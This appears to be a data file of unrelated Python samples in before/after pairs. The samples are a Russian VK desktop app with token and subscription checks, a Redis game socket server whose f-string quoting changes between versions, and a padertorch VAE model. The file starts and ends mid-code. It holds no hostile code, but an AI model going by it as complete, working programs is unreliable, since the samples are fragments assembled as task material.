size_last, peak = tracemalloc.get_traced_memory()
size_last = size_last // 1024
scheduler_logger.warning('Запускаю очситку мусора')
gc.collect()
size_now, size_peak = tracemalloc.get_traced_memory()
size_now = size_now // 1024
size_peak = size_peak // 1024
scheduler_logger.warning(
f'Использовалось: {size_last}Mib, Теперь: {size_now}Mib, '
f'В пике: {size_peak}Mib'
)
master = Tk()
master.overrideredirect(True)
error_logger = LOGGER('App', 'error')
try:
app_brain = BrainForApp(master)
except SystemExit:
error_logger.info('Закрытие программы')
pass
except MemoryError as error:
try:
master.destroy()
except TclError:
pass
size_now, peak = tracemalloc.get_traced_memory()
size_now = size_now // 1024
peak = peak // 1024
showerror(
'Ошибка',
f'Недостаточно оперативной памяти!\n\nИспользуется: {size_now}Mib'
f', В пике: {peak}Mib\n\n{error}'
)
error_logger.error(
'Нехватка памяти: Используется - '
f'{size_now}Mib, В пике - {peak}Mib --> {error}'
)
except BaseException as error:
try:
master.destroy()
except TclError:
pass
showerror(
'Ошибка',
f'Произошла непредвиденная ошибка\n\n{error}'
)
error_logger.error(
f'{error}'
)
| import gc
import os
import time
import tracemalloc
from math import ceil
from shutil import rmtree
from sys import exit as exit_ex
from sys import platform
from time import time as time_now
from tkinter import Label, Tk
from tkinter.messagebox import showerror, showinfo, showwarning
from typing import Union
from webbrowser import open_new_tab as web_open_new_tab
import requests
import vk_api
from _tkinter import TclError
from apscheduler.schedulers.background import BackgroundScheduler
from PIL import Image, ImageTk
from base_data import GetRequestsToDB, MainDB, UpdateRequestsToDB
from settings import (DEFAULT_VALUE_FOR_BD, HTTP_FOR_REQUESTS, HTTP_GET_TOKEN,
ID_GROUP_VK, INFO_MSG, LOGGER, REPO_BRANCH_MASTER,
REPO_BRANCH_UPDATER, REPO_BRANCH_VERSION,
TIME_FREE_VERSION, VERSION_API, WARNING_MSG, path,
path_to_dir_ico)
from windows import AdditionalWindows
if platform in ['linux']:
OS = 'Linux'
elif platform in ['win32', 'cygwin']:
OS = 'Windows'
else:
showerror(
'Платформа не поддерживается',
f'Неподдерживаемая платформа: {platform}\n\nОбратитесь за помощью '
'к боту VK'
)
exit_ex()
class BrainForApp:
"""
Класс отвечающий за настройку и запуск приложения
"""
def __init__(self, window_preview):
"""
Создаёт превью и проверяет нужные настройки для программы, а также
запускает её
:param window_preview: объект окна превью
"""
self.logger = LOGGER('main', 'main')
png_preview_open, png_preview = self.preview_image_open()
self.preview_image_set(png_preview_open, png_preview, window_preview)
window_preview.update()
tracemalloc.start()
time.sleep(2)
MainDB()
get_requests_db = GetRequestsToDB()
settings = get_requests_db.get_records(
tb_name=get_requests_db.settings, one_record=True,
select=['first_start', 'auto_update']
)
first_start = settings['first_start']
auto_update = settings['auto_update']
if first_start == 1:
self.logger.info('Первый запуск')
window_preview.destroy()
done = AdditionalWindows().person_and_agreement_data()
if done is True:
update_requests_db = UpdateRequestsToDB()
update_requests_db.update_table(
tb_name=update_requests_db.settings,
update_row={'first_start': 0}
)
self.logger.warning('Очистка от лишних файлов в директории')
list_path = os.listdir(path)
if REPO_BRANCH_UPDATER in list_path:
rmtree(REPO_BRANCH_UPDATER, ignore_errors=True, onerror=None)
if REPO_BRANCH_VERSION in list_path:
rmtree(REPO_BRANCH_VERSION, ignore_errors=True, onerror=None)
if REPO_BRANCH_MASTER in list_path:
rmtree(REPO_BRANCH_MASTER, ignore_errors=True, onerror=None)
try:
self.logger.warning('Закрытие окна первью')
window_preview.destroy()
except TclError:
pass
del settings, first_start, list_path, window_preview
gc.collect()
self.logger.info('Создание задачи scheduler')
scheduler = BackgroundScheduler()
scheduler.start()
scheduler.add_job(__scheduler__, 'interval', minutes=1)
self.logger.info('Запуск приложения')
from windows import App
App(auto_update, OS)
self.logger.info('Закрытие приложения')
def preview_image_open(self):
"""
Возвращает первью картинку
"""
while True:
try:
png_preview_open = Image.open(
os.path.join(path_to_dir_ico, 'preview.png')
)
png_preview = ImageTk.PhotoImage(png_preview_open)
return png_preview_open, png_preview
except FileNotFoundError as err:
self.logger.error(str(err))
@staticmethod
def preview_image_set(png_preview_open, png_preview, window_preview):
"""
Устанавливает размеры окна, ставит его по середине, устанавливает
картинку как фон
"""
x_img, y_img = png_preview_open.size
x = (window_preview.winfo_screenwidth() - x_img) // 2
y = (window_preview.winfo_screenheight() - y_img) // 2
window_preview.geometry("%ix%i+%i+%i" % (x_img, y_img, x, y))
Label(window_preview, image=png_preview).pack(side='top')
class ConfigureVkApi:
"""
Класс отвечающий за нстройку инструментов для запросов к API Vk
"""
def __init__(self, ignore_existing_token: bool = False):
self.logger = LOGGER('config_vk_api', 'vk_api')
get_requests_db = GetRequestsToDB()
user_data_table_value = get_requests_db.get_records(
tb_name=get_requests_db.userdata, one_record=True,
select=['access_token']
)
token = user_data_table_value['access_token']
self.__additional_windows = AdditionalWindows
if ignore_existing_token is False:
if (token is None) or (token == DEFAULT_VALUE_FOR_BD):
token = self.get_token()
else:
token = self.get_token()
if (token is not None) or (token != DEFAULT_VALUE_FOR_BD):
is_donat = self.check_is_donat(token)
if is_donat is False:
token = None
self.token = token
if self.token is not None:
vk_session = vk_api.VkApi(token=self.token)
self.vk_tool = vk_api.tools.VkTools(vk_session)
if ignore_existing_token is True:
showinfo(
'Авторизовались',
'Вы удачно авторизовались!'
)
self.logger.info('Получен vk_tool и сам токен')
else:
self.logger.error('vk_tool не удалось получить')
self.vk_tool = None
del get_requests_db, user_data_table_value
def get_token(self) -> Union[str, None]:
"""
Функция получения токнеа пользователя
:return:
"""
showinfo('Получение токена!', INFO_MSG['VK_API']['get_token'])
web_open_new_tab(HTTP_GET_TOKEN)
token = self.__additional_windows().get_token()
token = self.preparation_final_token(token)
if token == DEFAULT_VALUE_FOR_BD:
LOGGER.warning(
'При выполнении функции get_token был получен невалидный токен'
)
return None
params = {
'v': VERSION_API,
'access_token': token
}
try:
request = requests.get(
HTTP_FOR_REQUESTS.format(method='users.get'),
params=params
).json()
except ConnectionError:
showerror(
'Нет подключения',
'Не возиожно авторизоваться, нетп подключения к интернету'
)
return None
if request.get('error'):
showerror(
'Авторизация не удалась',
'Неверный токен авторизации, произошла ошибка, '
'повторите попытку'
)
return None
update_requests_db = UpdateRequestsToDB()
update_requests_db.update_table(
tb_name=update_requests_db.userdata,
update_row={'access_token': token}
)
del request
return token
@staticmethod
def check_is_donat(token: str) -> bool:
"""
Функция проверки оплаты подписки на программу пользователем
:param token: токен пользователя
:return:
"""
params = {
'v': VERSION_API,
'access_token': token,
'owner_id': ID_GROUP_VK
}
try:
request = requests.get(
HTTP_FOR_REQUESTS.format(method='donut.isDon'),
params=params
).json()
except ConnectionError:
showerror(
'Нет подключения',
'Невозможно авторизоваться, нет подключения к интернету'
)
return False
if request.get('error'):
showerror(
'Ошибка',
f'Произошла непредвиденная ошибка {request["error"]}'
)
response = request.get('response')
if int(response) == 1:
return True
else:
get_requests_db = GetRequestsToDB()
__start = GetRequestsToDB().get_records(
select=['start_free_version'], one_record=True,
tb_name=get_requests_db.settings
)['start_free_version']
if __start is None:
warning = WARNING_MSG['VK_API']['is_not_donat_free']
showwarning(
'Пробная версия!',
warning.format(min=TIME_FREE_VERSION // 60)
)
start_free_version = time_now()
update_request_db = UpdateRequestsToDB()
update_request_db.update_table(
tb_name=update_request_db.settings,
update_row={'start_free_version': int(start_free_version)}
)
return True
else:
time_use_free_version = ceil(time_now()) - int(__start)
if time_use_free_version >= TIME_FREE_VERSION:
warning = WARNING_MSG['VK_API']['is_not_donat']
showwarning(
'Пробная версия!',
warning
)
return False
else:
time_left = TIME_FREE_VERSION - time_use_free_version
warning = WARNING_MSG['VK_API']['is_not_donat_free']
showwarning(
'Пробная версия!',
warning.format(min=time_left // 60)
)
return True
def preparation_final_token(self, token: str) -> str:
"""
Функция обработки ссылки и получения из неё токена
:param token: ссылка с токеном
:return:
"""
token = token.split('access_token=')
if len(token) == 2:
token = token[1].split('&')[0]
return token
showwarning(
'Не смог распознать токен',
WARNING_MSG['VK_API']['non_inspected_token']
)
self.logger.warning(
'При выполнении preparation_final_token, не смог распознать токен'
)
return DEFAULT_VALUE_FOR_BD
if __name__ == '__main__':
def __scheduler__() -> None:
"""
Функция отвечает за сброс мусора и ведение логгера с информацией об
этом
:return:
"""
scheduler_logger = LOGGER('scheduler', 'main')
size_last, peak = tracemalloc.get_traced_memory()
size_last = size_last // 1024
scheduler_logger.warning('Запускаю очситку мусора')
gc.collect()
size_now, size_peak = tracemalloc.get_traced_memory()
size_now = size_now // 1024
size_peak = size_peak // 1024
scheduler_logger.warning(
f'Использовалось: {size_last}Mib, Теперь: {size_now}Mib, '
f'В пике: {size_peak}Mib'
)
master = Tk()
master.overrideredirect(True)
error_logger = LOGGER('App', 'error')
try:
app_brain = BrainForApp(master)
except SystemExit:
error_logger.info('Закрытие программы')
pass
except MemoryError as error:
try:
master.destroy()
except TclError:
pass
size_now, peak = tracemalloc.get_traced_memory()
size_now = size_now // 1024
peak = peak // 1024
showerror(
'Ошибка',
f'Недостаточно оперативной памяти!\n\nИспользуется: {size_now}Mib'
f', В пике: {peak}Mib\n\n{error}'
)
error_logger.error(
'Нехватка памяти: Используется - '
f'{size_now}Mib, В пике - {peak}Mib --> {error}'
)
except BaseException as error:
try:
master.destroy()
except TclError:
pass
showerror(
'Ошибка',
f'Произошла непредвиденная ошибка\n\n{error}'
)
error_logger.error(
f'{error}'
)
|
import importlib
import threading
import socket
import logging
import time
import redis
import exceptions
from client import Client
from inventory import Inventory
from parser import Parser
modules = ["client_error", "house", "outside", "user_rating", "mail", "avatar",
"location_game", "relations", "social_request", "user_rating",
"competition", "furniture", "billing", "component", "support"]
class Server():
def __init__(self, host="0.0.0.0", port=8123):
self.online = []
self.inv = {}
self.redis = redis.Redis(decode_responses=True)
self.parser = Parser()
self.clothes = self.parser.parse_clothes()
self.conflicts = self.parser.parse_conflicts()
self.modules = {}
for item in modules:
module = importlib.import_module(f"modules.{item}")
class_ = getattr(module, module.class_name)
self.modules[class_.prefix] = class_(self)
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.sock.bind((host, port))
def listen(self):
self.sock.listen(5)
logging.info("Server is ready to accept connections")
thread = threading.Thread(target=self._background)
thread.daemon = True
thread.start()
while True:
client, address = self.sock.accept()
thread = threading.Thread(target=Client(self).handle,
args=(client, address))
thread.daemon = True
thread.start()
def process_data(self, data, client):
if not client.uid:
if data["type"] != 1:
client.connection.close()
self.auth(data["msg"], client)
return
if data["type"] == 2:
client.connection.close()
return
elif data["type"] == 34:
prefix = data["msg"][1].split(".")[0]
if prefix not in self.modules:
logging.warning(f"Command {data["msg"][1]} not found")
return
self.modules[prefix].on_message(data["msg"], client)
def auth(self, msg, client):
uid = self.redis.get(f"auth:{msg[2]}")
if not uid:
client.connection.close()
return
for tmp in self.online:
if tmp.uid == uid:
tmp.connection.close()
break
client.uid = uid
self.online.append(client)
self.redis.set(f"uid:{uid}:lvt", int(time.time()))
if uid not in self.inv:
self.inv[uid] = Inventory(self, uid)
else:
self.inv[uid].expire = None
client.send([client.uid, True, False, False], type_=1)
client.checksummed = True
def get_user_data(self, uid):
pipe = self.redis.pipeline()
pipe.get(f"uid:{uid}:slvr").get(f"uid:{uid}:enrg")
pipe.get(f"uid:{uid}:gld").get(f"uid:{uid}:exp").get(f"uid:{uid}:emd")
pipe.get(f"uid:{uid}:lvt").get(f"uid:{uid}:trid").get(f"uid:{uid}:crt")
pipe.get(f"uid:{uid}:hrt").get(f"uid:{uid}:role")
result = pipe.execute()
if not result[0]:
return None
if result[7]:
crt = int(result[7])
else:
crt = self.update_crt(uid)
if result[8]:
hrt = int(result[8])
else:
hrt = self.update_hrt(uid)
if result[9]:
role = int(result[9])
else:
role = 0
return {"uid": uid, "slvr": int(result[0]), "enrg": int(result[1]),
"gld": int(result[2]), "exp": int(result[3]),
"emd": int(result[4]), "lvt": int(result[5]), "crt": crt,
"hrt": hrt, "trid": result[6], "role": role}
def get_appearance(self, uid):
apprnc = self.redis.lrange(f"uid:{uid}:appearance", 0, -1)
if not apprnc:
return False
return {"n": apprnc[0], "nct": int(apprnc[1]), "g": int(apprnc[2]),
"sc": int(apprnc[3]), "ht": int(apprnc[4]),
"hc": int(apprnc[5]), "brt": int(apprnc[6]),
"brc": int(apprnc[7]), "et": int(apprnc[8]),
"ec": int(apprnc[9]), "fft": int(apprnc[10]),
"fat": int(apprnc[11]), "fac": int(apprnc[12]),
"ss": int(apprnc[13]), "ssc": int(apprnc[14]),
"mt": int(apprnc[15]), "mc": int(apprnc[16]),
"sh": int(apprnc[17]), "shc": int(apprnc[18]),
"rg": int(apprnc[19]), "rc": int(apprnc[20]),
"pt": int(apprnc[21]), "pc": int(apprnc[22]),
"bt": int(apprnc[23]), "bc": int(apprnc[24])}
def get_clothes(self, uid, type_):
clothes = []
for item in self.redis.smembers(f"uid:{uid}:wearing"):
if "_" in item:
id_, clid = item.split("_")
clothes.append({"id": id_, "clid": clid})
else:
clothes.append({"id": item, "clid": None})
if type_ == 1:
clths = {"cc": "casual", "ccltns": {"casual": {"cct": [],
"cn": "",
"ctp": "casual"}}}
for item in clothes:
if item["clid"]:
clths["ccltns"]["casual"]["cct"].append(f"{item["id"]}:"
f"{item["clid"]}")
else:
clths["ccltns"]["casual"]["cct"].append(item["id"])
elif type_ == 2:
clths = {"clths": []}
for item in clothes:
clths["clths"].append({"tpid": item["id"],
"clid": item["clid"]})
elif type_ == 3:
clths = {"cct": []}
for item in clothes:
if item["clid"]:
clths["cct"].append(f"{item["id"]}:{item["clid"]}")
else:
clths["cct"].append(item["id"])
return clths
def get_room_items(self, uid, room):
if "_" in room:
raise exceptions.WrongRoom()
items = []
for name in self.redis.smembers(f"rooms:{uid}:{room}:items"):
item = self.redis.lrange(f"rooms:{uid}:{room}:items:{name}", 0, -1)
name, lid = name.split("_")
if len(item) == 5:
items.append({"tpid": name, "x": float(item[0]),
"y": float(item[1]), "z": float(item[2]),
"d": int(item[3]), "lid": int(lid),
"rid": item[4]})
else:
items.append({"tpid": name, "x": float(item[0]),
"y": float(item[1]), "z": float(item[2]),
"d": int(item[3]), "lid": int(lid)})
return items
def update_crt(self, uid):
logging.warning("stub update_crt")
return 0
def update_hrt(self, uid):
logging.warning("stub update_hrt")
return 0
def _background(self):
while True:
logging.info(f"Players online: {len(self.online)}")
for uid in self.inv.copy():
inv = self.inv[uid]
if inv.expire and time.time() - inv.expire > 0:
del self.inv[uid]
time.sleep(60)
if __name__ == "__main__":
logging.basicConfig(format="%(levelname)-8s [%(asctime)s] %(message)s",
datefmt="%H:%M:%S", level=logging.DEBUG)
server = Server()
server.listen()
| import importlib
import threading
import socket
import logging
import time
import redis
import exceptions
from client import Client
from inventory import Inventory
from parser import Parser
modules = ["client_error", "house", "outside", "user_rating", "mail", "avatar",
"location_game", "relations", "social_request", "user_rating",
"competition", "furniture", "billing", "component", "support"]
class Server():
def __init__(self, host="0.0.0.0", port=8123):
self.online = []
self.inv = {}
self.redis = redis.Redis(decode_responses=True)
self.parser = Parser()
self.clothes = self.parser.parse_clothes()
self.conflicts = self.parser.parse_conflicts()
self.modules = {}
for item in modules:
module = importlib.import_module(f"modules.{item}")
class_ = getattr(module, module.class_name)
self.modules[class_.prefix] = class_(self)
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.sock.bind((host, port))
def listen(self):
self.sock.listen(5)
logging.info("Server is ready to accept connections")
thread = threading.Thread(target=self._background)
thread.daemon = True
thread.start()
while True:
client, address = self.sock.accept()
thread = threading.Thread(target=Client(self).handle,
args=(client, address))
thread.daemon = True
thread.start()
def process_data(self, data, client):
if not client.uid:
if data["type"] != 1:
client.connection.close()
self.auth(data["msg"], client)
return
if data["type"] == 2:
client.connection.close()
return
elif data["type"] == 34:
prefix = data["msg"][1].split(".")[0]
if prefix not in self.modules:
logging.warning(f"Command {data['msg'][1]} not found")
return
self.modules[prefix].on_message(data["msg"], client)
def auth(self, msg, client):
uid = self.redis.get(f"auth:{msg[2]}")
if not uid:
client.connection.close()
return
for tmp in self.online:
if tmp.uid == uid:
tmp.connection.close()
break
client.uid = uid
self.online.append(client)
self.redis.set(f"uid:{uid}:lvt", int(time.time()))
if uid not in self.inv:
self.inv[uid] = Inventory(self, uid)
else:
self.inv[uid].expire = None
client.send([client.uid, True, False, False], type_=1)
client.checksummed = True
def get_user_data(self, uid):
pipe = self.redis.pipeline()
pipe.get(f"uid:{uid}:slvr").get(f"uid:{uid}:enrg")
pipe.get(f"uid:{uid}:gld").get(f"uid:{uid}:exp").get(f"uid:{uid}:emd")
pipe.get(f"uid:{uid}:lvt").get(f"uid:{uid}:trid").get(f"uid:{uid}:crt")
pipe.get(f"uid:{uid}:hrt").get(f"uid:{uid}:role")
result = pipe.execute()
if not result[0]:
return None
if result[7]:
crt = int(result[7])
else:
crt = self.update_crt(uid)
if result[8]:
hrt = int(result[8])
else:
hrt = self.update_hrt(uid)
if result[9]:
role = int(result[9])
else:
role = 0
return {"uid": uid, "slvr": int(result[0]), "enrg": int(result[1]),
"gld": int(result[2]), "exp": int(result[3]),
"emd": int(result[4]), "lvt": int(result[5]), "crt": crt,
"hrt": hrt, "trid": result[6], "role": role}
def get_appearance(self, uid):
apprnc = self.redis.lrange(f"uid:{uid}:appearance", 0, -1)
if not apprnc:
return False
return {"n": apprnc[0], "nct": int(apprnc[1]), "g": int(apprnc[2]),
"sc": int(apprnc[3]), "ht": int(apprnc[4]),
"hc": int(apprnc[5]), "brt": int(apprnc[6]),
"brc": int(apprnc[7]), "et": int(apprnc[8]),
"ec": int(apprnc[9]), "fft": int(apprnc[10]),
"fat": int(apprnc[11]), "fac": int(apprnc[12]),
"ss": int(apprnc[13]), "ssc": int(apprnc[14]),
"mt": int(apprnc[15]), "mc": int(apprnc[16]),
"sh": int(apprnc[17]), "shc": int(apprnc[18]),
"rg": int(apprnc[19]), "rc": int(apprnc[20]),
"pt": int(apprnc[21]), "pc": int(apprnc[22]),
"bt": int(apprnc[23]), "bc": int(apprnc[24])}
def get_clothes(self, uid, type_):
clothes = []
for item in self.redis.smembers(f"uid:{uid}:wearing"):
if "_" in item:
id_, clid = item.split("_")
clothes.append({"id": id_, "clid": clid})
else:
clothes.append({"id": item, "clid": None})
if type_ == 1:
clths = {"cc": "casual", "ccltns": {"casual": {"cct": [],
"cn": "",
"ctp": "casual"}}}
for item in clothes:
if item["clid"]:
clths["ccltns"]["casual"]["cct"].append(f"{item['id']}:"
f"{item['clid']}")
else:
clths["ccltns"]["casual"]["cct"].append(item["id"])
elif type_ == 2:
clths = {"clths": []}
for item in clothes:
clths["clths"].append({"tpid": item["id"],
"clid": item["clid"]})
elif type_ == 3:
clths = {"cct": []}
for item in clothes:
if item["clid"]:
clths["cct"].append(f"{item['id']}:{item['clid']}")
else:
clths["cct"].append(item["id"])
return clths
def get_room_items(self, uid, room):
if "_" in room:
raise exceptions.WrongRoom()
items = []
for name in self.redis.smembers(f"rooms:{uid}:{room}:items"):
item = self.redis.lrange(f"rooms:{uid}:{room}:items:{name}", 0, -1)
name, lid = name.split("_")
if len(item) == 5:
items.append({"tpid": name, "x": float(item[0]),
"y": float(item[1]), "z": float(item[2]),
"d": int(item[3]), "lid": int(lid),
"rid": item[4]})
else:
items.append({"tpid": name, "x": float(item[0]),
"y": float(item[1]), "z": float(item[2]),
"d": int(item[3]), "lid": int(lid)})
return items
def update_crt(self, uid):
logging.warning("stub update_crt")
return 0
def update_hrt(self, uid):
logging.warning("stub update_hrt")
return 0
def _background(self):
while True:
logging.info(f"Players online: {len(self.online)}")
for uid in self.inv.copy():
inv = self.inv[uid]
if inv.expire and time.time() - inv.expire > 0:
del self.inv[uid]
time.sleep(60)
if __name__ == "__main__":
logging.basicConfig(format="%(levelname)-8s [%(asctime)s] %(message)s",
datefmt="%H:%M:%S", level=logging.DEBUG)
server = Server()
server.listen()
|
import numpy as np
import torch
from einops import rearrange
from padertorch.base import Model
from padertorch.contrib.je.modules.conv import CNN1d, CNNTranspose1d
from padertorch.contrib.je.modules.gmm import GMM
from padertorch.contrib.je.modules.hmm import HMM
from padertorch.contrib.je.modules.features import NormalizedLogMelExtractor
from padertorch.contrib.je.modules.global_pooling import Mean
from padertorch.contrib.je.modules.hybrid import HybridCNN, HybridCNNTranspose
from sklearn import metrics
from torch.distributions import Normal
from torchvision.utils import make_grid
class VAE(Model):
"""
>>> config = VAE.get_config(dict(\
encoder=dict(\
factory=HybridCNN,\
input_size=80,\
cnn_2d=dict(\
in_channels=1, out_channels=3*[32], kernel_size=3, \
), \
cnn_1d=dict(\
out_channels=3*[32], kernel_size=3\
),\
),\
feature_extractor=dict(\
sample_rate=16000,\
fft_length=512,\
n_mels=80,\
),\
))
>>> config['encoder']['cnn_1d']['in_channels']
2560
>>> config['encoder']['cnn_1d']['out_channels']
[32, 32, 32]
>>> config['decoder']['cnn_transpose_1d']['in_channels']
16
>>> vae = VAE.from_config(config)
>>> inputs = {'stft': torch.zeros((4, 1, 100, 257, 2)), 'seq_len': None}
>>> outputs = vae(inputs)
>>> outputs[0][0].shape
torch.Size([4, 1, 80, 100])
>>> outputs[0][1].shape
torch.Size([4, 1, 80, 100])
>>> outputs[1][0][0].shape
torch.Size([4, 16, 100])
>>> outputs[1][0][1].shape
torch.Size([4, 16, 100])
>>> review = vae.review(inputs, outputs)
"""
def __init__(
self, encoder: HybridCNN, decoder: HybridCNNTranspose, *,
feature_key='stft', feature_extractor=None, feature_size=None,
):
super().__init__()
# allow joint optimization of encoder and decoder
self.encoder = encoder
self.decoder = decoder
self.feature_key = feature_key
self.feature_extractor = feature_extractor
self.feature_size = feature_size
self.n_params = 2
def encode(self, x, seq_len=None):
if isinstance(self.encoder, CNN1d):
x = rearrange(x, 'b c f t -> b (c f) t')
if self.encoder.return_pool_indices:
h, seq_len, pool_indices = self.encoder(x, seq_len=seq_len)
else:
h, seq_len = self.encoder(x, seq_len=seq_len)
pool_indices = None
assert not h.shape[1] % self.n_params
params = tuple(torch.split(h, h.shape[1] // self.n_params, dim=1))
return params, seq_len, pool_indices
def reparameterize(self, params):
mu, logvar = params[:2]
if self.training:
std = torch.exp(0.5 * logvar)
eps = torch.randn_like(std)
return eps * std + mu
else:
return mu
def decode(self, z, seq_len=None, shapes=None, lengths=None, pool_indices=None):
x_hat, seq_len = self.decoder(
z, seq_len=seq_len, shapes=shapes, seq_lens=lengths, pool_indices=pool_indices
)
if x_hat.dim() == 3:
b, f, t = x_hat.shape
x_hat = x_hat.view((b, -1, self.feature_size, t))
return x_hat, seq_len # (B, C, F, T)
def forward(self, inputs):
x_target = inputs[self.feature_key]
seq_len = inputs['seq_len']
if self.feature_extractor is not None:
x_target = self.feature_extractor(x_target, seq_len)
params, seq_len, pool_indices = self.encode(x_target, seq_len)
x_shape = x_target.shape
if isinstance(self.encoder, CNN1d):
x_shape = (x_shape[0], x_shape[1]*x_shape[2], x_shape[3])
shapes = self.encoder.get_shapes(x_shape)
if seq_len is None:
lengths = None
else:
lengths = self.encoder.get_seq_lens(seq_len)
z = self.reparameterize(params)
x_hat, _ = self.decode(
z, seq_len, shapes=shapes, lengths=lengths, pool_indices=pool_indices
)
return (x_target, x_hat), (params, seq_len)
def review(self, inputs, outputs):
# visualization
(x_target, *x_hats), (params, seq_len), *_ = outputs
(mu, log_var) = params[:2]
kld = -0.5 * (1 + log_var - mu.pow(2) - log_var.exp()).sum(dim=1)
kld = Mean(axis=-1)(kld, seq_len)
mu = mu.contiguous()
review = dict(
losses=dict(
kld=kld.mean(),
),
histograms=dict(
kld_=kld.flatten(),
mu_=mu.flatten(),
log_var_=log_var.flatten(),
),
images=dict(
targets=x_target[:3, :1],
latents=mu[:3],
)
)
seq_len = inputs['seq_len']
for i, x_hat in enumerate(x_hats):
mse = (x_hat - x_target).pow(2).sum(dim=(1, 2))
mse = Mean(axis=-1)(mse, seq_len)
review['losses'][f'rec{i}'] = mse.mean()
review['histograms'][f'rec{i}_'] = mse
review['images'][f'x_hat_{i}_'] = x_hat.contiguous()[:3, :1]
return review
def modify_summary(self, summary):
summary = super().modify_summary(summary)
for key, image in summary['images'].items():
if image.dim() == 3:
image = image.unsqueeze(1)
summary['images'][key] = make_grid(
image.flip(2), normalize=True, scale_each=False, nrow=1
)
return summary
@classmethod
def finalize_dogmatic_config(cls, config):
config['encoder']['factory'] = CNN1d
config['feature_extractor'] = {
'factory': NormalizedLogMelExtractor,
}
in_channels = None
if config['feature_extractor'] is not None:
if config['feature_extractor']['factory'] == NormalizedLogMelExtractor:
config['feature_size'] = config['feature_extractor']['n_mels']
in_channels = 1 + config['feature_extractor']['add_deltas']+config['feature_extractor']['add_delta_deltas']
feature_size = config['feature_size']
if config['encoder']['factory'] == HybridCNN:
if feature_size is not None:
config['encoder'].update({
'input_size': feature_size,
})
if in_channels is not None:
config['encoder']['cnn_2d']['in_channels'] = in_channels
content_emb_dim = config['encoder']['cnn_1d']['out_channels'][-1] // 2
elif config['encoder']['factory'] == CNN1d:
if feature_size is not None and in_channels is not None:
config['encoder']['in_channels'] = feature_size * in_channels
content_emb_dim = config['encoder']['out_channels'][-1] // 2
else:
raise ValueError(f'Factory {config['encoder']['factory']} not allowed.')
config['decoder'] = config['encoder']['factory'].get_transpose_config(config['encoder'])
if config['decoder']['factory'] == HybridCNNTranspose:
config['decoder']['cnn_transpose_1d']['in_channels'] = content_emb_dim
elif config['decoder']['factory'] == CNNTranspose1d:
config['decoder']['in_channels'] = content_emb_dim
else:
raise ValueError(f'Factory {config['decoder']['factory']} not allowed.')
class GMMVAE(VAE):
"""
>>> config = GMMVAE.get_config(dict(\
encoder=dict(\
factory=HybridCNN,\
input_size=80,\
cnn_2d=dict(\
in_channels=1, out_channels=3*[32], kernel_size=3, \
), \
cnn_1d=dict(\
out_channels=3*[32], kernel_size=3\
),\
),\
decoder=dict(cnn_transpose_1d=dict(in_channels=16)),\
gmm=dict(num_classes=10),\
feature_extractor=dict(\
factory=NormalizedLogMelExtractor,\
sample_rate=16000,\
fft_length=512,\
n_mels=80,\
),\
))
>>> config['encoder']['cnn_1d']['in_channels']
2560
>>> config['encoder']['cnn_1d']['out_channels']
[32, 32, 32]
>>> config['decoder']['cnn_transpose_1d']['in_channels']
16
>>> gmmvae = GMMVAE.from_config(config)
>>> inputs = {'stft': torch.zeros((4, 1, 100, 257, 2)), 'seq_len': None, 'labels': torch.Tensor([1,2,3,4]).long()}
>>> outputs = gmmvae(inputs)
>>> outputs[0][0].shape
torch.Size([4, 1, 80, 100])
>>> outputs[0][1].shape
torch.Size([4, 1, 80, 100])
>>> outputs[1][0][0].shape
torch.Size([4, 16, 100])
>>> outputs[1][0][1].shape
torch.Size([4, 16, 100])
>>> outputs[2][0].shape
torch.Size([4, 100, 10])
>>> outputs[2][1].shape
torch.Size([4, 100, 10])
>>> review = gmmvae.review(inputs, outputs)
>>> gmmvae.supervised = True
>>> gmmvae.label_key = 'labels'
>>> outputs = gmmvae(inputs)
>>> review = gmmvae.review(inputs, outputs)
"""
def __init__(
self, encoder: HybridCNN, decoder: HybridCNNTranspose, gmm: GMM, *,
feature_key='stft', feature_extractor=None, feature_size=None,
label_key=None, supervised=False,
):
super().__init__(
encoder=encoder, decoder=decoder,
feature_key=feature_key, feature_extractor=feature_extractor,
feature_size=feature_size,
)
self.gmm = gmm
self.label_key = label_key
self.supervised = supervised
def forward(self, inputs):
(x, x_hat), ((mu, log_var), seq_len) = super().forward(inputs)
qz = Normal(
loc=rearrange(mu, 'b d t -> b t d'),
scale=torch.exp(0.5 * rearrange(log_var, 'b d t -> b t d'))
)
log_class_posterior, log_rho = self.gmm(qz)
return (x, x_hat), ((mu, log_var), seq_len), (log_class_posterior, log_rho)
def review(self, inputs, outputs):
review = super().review(inputs, outputs)
_, (params, seq_len), (log_class_posterior, log_rho) = outputs
class_labels = inputs[self.label_key] if self.supervised else None
class_posterior = log_class_posterior.exp().detach()
if class_labels is None:
kld = -(class_posterior * log_rho).sum(-1)
class_ce = -(class_posterior * self.gmm.log_class_probs).sum(-1)
else:
if class_labels.dim() < 2:
class_labels = class_labels[:, None]
class_labels = class_labels.expand(log_rho.shape[:2])
kld = -log_rho.gather(-1, class_labels[..., None]).squeeze(-1)
class_ce = -self.gmm.log_class_probs[class_labels]
kld = Mean(axis=-1)(kld, seq_len)
class_ce = Mean(axis=-1)(class_ce, seq_len)
max_class_posterior, classes = torch.max(
torch.exp(log_class_posterior), -1
)
review['losses'].update(dict(
kld=kld.mean(),
class_ce=class_ce.mean(),
log_class_prob=self.gmm.log_class_probs.sum()
))
review['scalars'] = dict(
classes=classes.flatten(),
)
if self.label_key is not None:
labels = inputs[self.label_key]
review['scalars'].update(dict(
labels=labels.flatten()
))
review['histograms'].update(dict(
kld_=kld.flatten(),
log_class_probs_=self.gmm.log_class_probs.flatten(),
max_class_posterior_=max_class_posterior.flatten(),
classes_=classes.flatten()
))
return review
def modify_summary(self, summary):
predictions = summary['scalars'].pop('classes', None)
if predictions is not None:
summary['scalars']['n_classes'] = len(np.unique(predictions))
labels = summary['scalars'].pop('labels', None)
if predictions is not None and labels is not None:
_, labels = np.unique(labels, return_inverse=True)
_, predictions = np.unique(predictions, return_inverse=True)
contingency_matrix = metrics.cluster.contingency_matrix(
labels, predictions
)
p_true_pred = contingency_matrix / contingency_matrix.sum()
p_true = p_true_pred.sum(axis=1, keepdims=True)
p_true_given_pred = contingency_matrix / np.maximum(contingency_matrix.sum(axis=0, keepdims=True), 1)
h_true = -np.sum(p_true * np.log(np.maximum(p_true, 1e-12)))
